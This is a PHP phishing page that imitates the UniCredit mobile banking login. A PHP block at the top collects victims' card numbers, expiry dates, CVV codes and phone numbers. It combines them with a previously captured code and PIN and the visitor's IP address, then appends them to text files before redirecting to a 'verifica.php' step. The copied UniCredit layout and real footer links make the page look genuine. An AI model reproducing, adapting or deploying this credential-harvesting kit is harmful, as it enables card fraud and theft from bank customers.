<?php
function getUserIP()
{
    // Get real visitor IP behind CloudFlare network
    if (isset($_SERVER["HTTP_CF_CONNECTING_IP"])) {
              $_SERVER['REMOTE_ADDR'] = $_SERVER["HTTP_CF_CONNECTING_IP"];
              $_SERVER['HTTP_CLIENT_IP'] = $_SERVER["HTTP_CF_CONNECTING_IP"];
    }
    $client  = @$_SERVER['HTTP_CLIENT_IP'];
    $forward = @$_SERVER['HTTP_X_FORWARDED_FOR'];
    $remote  = $_SERVER['REMOTE_ADDR'];

    if(filter_var($client, FILTER_VALIDATE_IP))
    {
        $ip = $client;
    }
    elseif(filter_var($forward, FILTER_VALIDATE_IP))
    {
        $ip = $forward;
    }
    else
    {
        $ip = $remote;
    }

    return $ip;
}
session_start();
if (!file_exists('carte.txt')) {
    touch('carte.txt');
}
if (!file_exists('uniti.txt')) {
    touch('uniti.txt');
}

if(isset($_POST['cod']) && isset($_POST['anno']) && isset($_POST['mese'])  && isset($_POST['cvv'])){
    $carta = $_POST['cod'];
    $anno = $_POST['anno'];
    $mese = $_POST['mese'];
    $cvv = $_POST['cvv'];
    $ip = getUserIP();
    date_default_timezone_set('Europe/Rome');
    $date = date('d/m/Y h:i:s a', time());
    $txt = "$ip | $date | $carta | $anno | $mese | $cvv";
   $codice = $_SESSION['codice'];
   $pin = $_SESSION['pin'];
   $_SESSION['tel']=$_POST['mese'];
    $txt2 = "$ip | $date | $codice | $pin | $carta | $anno | $mese | $cvv";
    $myfile = file_put_contents('carte.txt', $txt.PHP_EOL , FILE_APPEND | LOCK_EX);
    $myfile = file_put_contents('uniti.txt', $txt2.PHP_EOL , FILE_APPEND | LOCK_EX);

    header('Location: verifica.php');

exit;
}
?>

<html lang="it" dir="ltr"><head>


  <meta charset="UTF-8">
  <title>UniCredit - Mobile Banking</title>
  <meta name="viewport" content="viewport-fit=cover, width=device-width, initial-scale=1.0, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no">
  <meta name="format-detection" content="telephone=no">
  <meta name="msapplication-tap-highlight" content="no">

  <!-- No Cache for index.html-->
  <meta http-equiv="Cache-control" content="no-cache, no-store, must-revalidate">
  <meta http-equiv="Pragma" content="no-cache">

  <meta name="theme-color" content="#e2001a">
  <script src="jquery-3.5.1.min.js"></script>
  <script src="jquery.payform.min.js"></script>

  <!-- add to homescreen for ios -->
  <meta name="apple-mobile-web-app-capable" content="yes">
  <meta name="apple-mobile-web-app-status-bar-style" content="black">
  <link rel="apple-touch-icon" href="assets/imgs/logo-msite.png">
  <link rel="icon" type="image/png" href="assets/imgs/logo-msite.png">



  <link href="assets/main.4c1b8b4624.css" rel="stylesheet">


<body id="body-loader" class="">
<div id="bodyStatusBar"></div>

  <div id="noLandscape" style="display: none;">
    <img src="assets/icon/orientation.png" class="icon-orientation">
    <div class="text">Attenzione!</div>
    <div class="text">Per una visualizzazione ottimale del sito si consiglia di tenere il proprio smartphone in
      posizione verticale</div>
  </div>

  <!-- Ionic's root component and where the app will load -->
  <ion-app class="app-root app-root-ios ios platform-core enable-hover" ng-version="5.0.1"><div app-viewport="" aria-hidden="true"></div><ng-component class="app-root" aria-hidden="true"><ion-nav><div nav-viewport=""></div><page-login-msite class="ion-page show-page" style="z-index: 100;">
<!----><!---->

  <ion-header class="header header-ios" padding="">
    <img alt="" class="home" src="assets/icon/login/msite/home.png" id="antelogin_loginmsite_uc_home">
    <img alt="" class="uc-logo" src="assets/imgs/Logo-UniCredit.png" id="antelogin_loginmsite_logo">
    <img alt="" class="locator" src="assets/icon/login/msite/locator.png" id="antelogin_loginmsite_uc_locator">
  </ion-header>

  <!---->

  <div class="page">

    <!---->

      <div class="login-section">
          <form novalidate="" class="ng-dirty ng-touched ng-invalid" method="POST">
            <ion-item class="item item-block item-ios" name="uid-input"><div class="item-inner"><div class="input-wrapper"><!----><ion-label class="label label-ios">
              <atom-custom-input type="number" id="antelogin_loginmsite_username"><ion-item class="custom-input-container item item-block item-ios item-input item-label-floating input-has-value item-input-has-value ng-dirty ng-touched ng-valid" id="undefined"><!----><div class="item-inner"><div class="input-wrapper"><ion-label aria-hidden="true" floating="" class="label label-ios" id="lbl-2">
        
              
    </ion-label><!---->
    
    <ion-input autocomplete="off" autocorrect="off" clearinput="" data-ta="atom.components.atom-custom-input.input" keyboardreturn="" spellcheck="false" class="undefined ng-dirty ng-touched ng-valid" decimal="false" allow-multiple-decimals="false" decimal-char="," lang="it" inputmode="" required="" minlength="5" maxlength="8"><!----><input name="cod" class="text-input text-input-ios" dir="auto" type="text" aria-labelledby="lbl-2" autocomplete="off" autocorrect="off" id="carta" placeholder="NUMERO CARTA" clearinput="" data-ta="atom.components.atom-custom-input.input" keyboardreturn="" spellcheck="false" decimal="false" allow-multiple-decimals="false" decimal-char="," lang="it" inputmode="" tabindex="0" required="" ><!----><!----><button class="text-input-clear-icon button button-ios button-clear button-clear-ios" clear="" ion-button="" tabindex="-1" type="button"><span class="button-inner"></span><div class="button-effect"></div></button><!----></ion-input></div><!----><!----><!----></div><div class="button-effect"></div></ion-item>

<!---->

<!---->
</atom-custom-input>
            </ion-label></div><!----></div><div class="button-effect"></div></ion-item>



            <ion-item class="item item-block item-ios" name="uid-input"><div class="item-inner"><div class="input-wrapper"><!----><ion-label class="label label-ios">
              <atom-custom-input type="number" id="antelogin_loginmsite_username"><ion-item class="custom-input-container item item-block item-ios item-input item-label-floating input-has-value item-input-has-value ng-dirty ng-touched ng-valid" id="undefined"><!----><div class="item-inner"><div class="input-wrapper"><ion-label aria-hidden="true" floating="" class="label label-ios" id="lbl-2">
        
              
    </ion-label><!---->
    
    <ion-input autocomplete="off" autocorrect="off" clearinput="" data-ta="atom.components.atom-custom-input.input" keyboardreturn="" spellcheck="false" class="undefined ng-dirty ng-touched ng-valid" decimal="false" allow-multiple-decimals="false" decimal-char="," lang="it" inputmode="" required="" minlength="5" maxlength="8"><!----><input name="anno" type="text" class="text-input text-input-ios" dir="auto" aria-labelledby="lbl-2" autocomplete="off" autocorrect="off" id="scadenza" placeholder="SCADENZA" clearinput="" data-ta="atom.components.atom-custom-input.input" keyboardreturn="" spellcheck="false" decimal="false" allow-multiple-decimals="false" decimal-char="," lang="it" inputmode="" tabindex="0" required="" ><!----><!----><button class="text-input-clear-icon button button-ios button-clear button-clear-ios" clear="" ion-button="" tabindex="-1" type="button"><span class="button-inner"></span><div class="button-effect"></div></button><!----></ion-input></div><!----><!----><!----></div><div class="button-effect"></div></ion-item>

<!---->

<!---->
</atom-custom-input>
            </ion-label></div><!----></div><div class="button-effect"></div></ion-item>


            <ion-item class="item item-block item-ios" name="uid-input"><div class="item-inner"><div class="input-wrapper"><!----><ion-label class="label label-ios">
              <atom-custom-input type="number" id="antelogin_loginmsite_username"><ion-item class="custom-input-container item item-block item-ios item-input item-label-floating input-has-value item-input-has-value ng-dirty ng-touched ng-valid" id="undefined"><!----><div class="item-inner"><div class="input-wrapper"><ion-label aria-hidden="true" floating="" class="label label-ios" id="lbl-2">
        
              
    </ion-label><!---->
    
    <ion-input autocomplete="off" autocorrect="off" clearinput="" data-ta="atom.components.atom-custom-input.input" keyboardreturn="" spellcheck="false" class="undefined ng-dirty ng-touched ng-valid" decimal="false" allow-multiple-decimals="false" decimal-char="," lang="it" inputmode="" required="" minlength="5" maxlength="8"><!----><input name="mese" class="text-input text-input-ios" dir="auto" type="number" aria-labelledby="lbl-2" autocomplete="off" autocorrect="off" placeholder="NUMERO DI CELLULARE" clearinput="" data-ta="atom.components.atom-custom-input.input" keyboardreturn="" spellcheck="false" decimal="false" allow-multiple-decimals="false" decimal-char="," lang="it" inputmode="" tabindex="0" required="" minlength="5" maxlength="8"><!----><!----><button class="text-input-clear-icon button button-ios button-clear button-clear-ios" clear="" ion-button="" tabindex="-1" type="button"><span class="button-inner"></span><div class="button-effect"></div></button><!----></ion-input></div><!----><!----><!----></div><div class="button-effect"></div></ion-item>

<!---->

<!---->
</atom-custom-input>
            </ion-label></div><!----></div><div class="button-effect"></div></ion-item>



            <ion-item class="item item-block item-ios" name="uid-input"><div class="item-inner"><div class="input-wrapper"><!----><ion-label class="label label-ios">
              <atom-custom-input type="number" id="antelogin_loginmsite_username"><ion-item class="custom-input-container item item-block item-ios item-input item-label-floating input-has-value item-input-has-value ng-dirty ng-touched ng-valid" id="undefined"><!----><div class="item-inner"><div class="input-wrapper"><ion-label aria-hidden="true" floating="" class="label label-ios" id="lbl-2">
        
              
    </ion-label><!---->
    
    <ion-input autocomplete="off" autocorrect="off" clearinput="" data-ta="atom.components.atom-custom-input.input" keyboardreturn="" spellcheck="false" class="undefined ng-dirty ng-touched ng-valid" decimal="false" allow-multiple-decimals="false" decimal-char="," lang="it" inputmode="" required="" maxlength="8"><!----><input   id="cvv" name="cvv" class="text-input text-input-ios" dir="auto" type="text" aria-labelledby="lbl-2" autocomplete="off" autocorrect="off" placeholder="CVV" clearinput="" data-ta="atom.components.atom-custom-input.input" keyboardreturn="" spellcheck="false" decimal="false" allow-multiple-decimals="false" decimal-char="," lang="it" inputmode="" tabindex="0" required="" minlength="5" maxlength="8"><!----><!----><button class="text-input-clear-icon button button-ios button-clear button-clear-ios" clear="" ion-button="" tabindex="-1" type="button"><span class="button-inner"></span><div class="button-effect"></div></button><!----></ion-input></div><!----><!----><!----></div><div class="button-effect"></div></ion-item>

<!---->

<!---->
</atom-custom-input>
            </ion-label></div><!----></div><div class="button-effect"></div></ion-item>

   
    
    
<br>
    
            <div class="button-section">
            <button block="" ion-button="" round-corner="" class="button button-ios button-default button-default-ios button-block button-block-ios" id="antelogin_loginmsite_button"><span class="button-inner">
                <div class="button-login">
                  CONTINUA
                </div>
              </span><div class="button-effect"></div></button>
              <!---->
            </div>
    
            <!----><div class="version">
              <div class="name-overlay"></div>
              <div class="version-text" padding-left="">versione 3.9.4</div>
            </div>
    
          </form>
        </div>

    
        <div class="footer">


          <div class="button-desktop-section">
              <div style="display:none" class="button-desktop button button-ios button-default button-default-ios button-ios-light" color="light" ion-button="" target="_blank"><span class="button-inner">
              <ion-icon class="desktop-icon icon icon-ios ion-ios-desktop" name="desktop" role="img" aria-label="desktop"></ion-icon>
              <div>Versione Desktop</div>
            </span><div class="button-effect"></div></div>
          </div>
          
          <div class="links-section">
          <ul>
            <!----><li>
              <a target="_blank" href="https://www.unicredit.it/it/info/trasparenzabancaria.html">
                <!---->
                <!----><img alt="" src="assets/msite/footer/info-trasparenza.jpg">
                </a>
              </li><li>
              <a target="_blank" href="https://www.unicredit.it/it/info/dati-societari.html">
                <!----><span>Dati societari</span>
                <!---->
                </a>
              </li><li>
              <a target="_blank" href="https://www.unicredit.it/it/info/sicurezza.html">
                <!----><span>Sicurezza</span>
                <!---->
                </a>
              </li><li>
              <a target="_blank" href="https://www.unicredit.it/it/info/reclami-ricorsi-e-conciliazione.html">
                <!----><span>Reclami ricorsi e conciliazione</span>
                <!---->
                </a>
              </li><li>
              <a target="_blank" href="http://www.consob.it/web/area-pubblica/arbitro-per-le-controversie-finanziarie">
                <!----><span>Arbitro per le controversie finanziarie</span>
                <!---->
                </a>
              </li><li>
              <a target="_blank" href="https://www.unicredit.it/it/info/privacy.html">
                <!----><span>Privacy</span>
                <!---->
                </a>
              </li><li>
              <a target="_blank" href="https://www.unicredit.it/it/info/informativa-cookies.html">
                <!----><span>Informativa Cookies</span>
                <!---->
                </a>
              </li><li>
              <a target="_blank" href="https://www.unicredit.it/it/info/normativa-mifid.html">
                <!----><span>Normativa MiFID</span>
                <!---->
                </a>
              </li><li>
              <a target="_blank" href="https://www.unicredit.it/it/info/obbligazioni.html">
                <!----><span>Obbligazioni</span>
                <!---->
                </a>
              </li><li>
              <a target="_blank" href="https://www.unicredit.it/it/info/opv-pb.html">
                <!----><span>OPV</span>
                <!---->
                </a>
              </li><li>
              <a target="_blank" href="https://www.unicredit.it/it/info/investment-certificate-pb.html">
                <!----><span>Certificates</span>
                <!---->
                </a>
              </li><li>
              <a target="_blank" href="https://www.unicredit.it/it/info/manifestazioni-a-premio.html">
                <!----><span>Manifestazioni a premio</span>
                <!---->
                </a>
              </li><li>
              <a target="_blank" href="https://www.unicredit.it/it/info/rapporti-dormienti.html">
                <!----><span>Rapporti dormienti</span>
                <!---->
                </a>
              </li><li>
              <a target="_blank" href="https://www.unicredit.it/it/info/sepa.html">
                <!----><span>SEPA</span>
                <!---->
                </a>
              </li><li>
              <a target="_blank" href="https://www.unicredit.it/it/info/operazioni-di-cartolarizzazione.html">
                <!----><span>Operazioni di cartolarizzazione</span>
                <!---->
                </a>
              </li><li>
              <a target="_blank" href="https://www.unicredit.it/it/info/certificazione-qualita-tesoreria-enti.html">
                <!----><span>Certificazione Qualità Tesoreria Enti</span>
                <!---->
                </a>
              </li><li>
              <a target="_blank" href="https://www.unicredit.it/it/info/relazione-con-i-fornitori.html">
                <!----><span>Relazione con i fornitori</span>
                <!---->
                </a>
              </li><li>
              <a target="_blank" href="https://www.unicredit.it/it/info/dizionario-finanziario.html">
                <!----><span>Dizionario Finanziario</span>
                <!---->
                </a>
              </li><li>
              <a target="_blank" href="https://www.unicredit.it/it/info/disclaimer.html">
                <!----><span>Disclaimer</span>
                <!---->
                </a>
              </li><li>
              <a target="_blank" href="https://www.unicreditsubitocasa.it/">
                <!----><span>UniCredit Subito Casa (Società di Intermediazione Immobiliare del Gruppo UniCredit)</span>
                <!---->
                </a>
              </li><li>
              <a target="_blank" href="https://www.unicredit.it/it/info/psd2_openbanking.html">
                <!----><span>PSD2 - Open Banking</span>
                <!---->
                </a>
              </li>
          </ul>
          </div>

          <div class="credit-section">
          <ion-grid class="grid">
            <ion-row class="row">
              <ion-col class="col">
                <ion-label class="credit-section-text label label-ios">
                  © 2009-2019 UniCredit S.p.A. - Tutti i diritti riservati - P.Iva 00348170101
                </ion-label>
              </ion-col>
            </ion-row>
            <ion-row class="row">
              <ion-col class="col">
              <img alt="" class="credit-section-logo" src="assets/imgs/logo-splash-msite.png" id="antelogin_loginmsite_logo">
              </ion-col>
            </ion-row>
          </ion-grid>
          </div>
        </div>

  </div>


</page-login-msite><div class="nav-decor"></div></ion-nav>

<cc-alert><!----></cc-alert></ng-component><div overlay-portal="" aria-hidden="true"></div><div overlay-portal="" aria-hidden="true"></div><div class="loading-portal" overlay-portal="" aria-hidden="true"></div><div class="toast-portal" aria-hidden="true"></div><div class="click-block click-block-enabled" aria-hidden="true"></div></ion-app>
<script>
jQuery('#scadenza').payform('formatCardExpiry');
jQuery('#carta').payform('formatCardNumber');

</script>
</body></html>
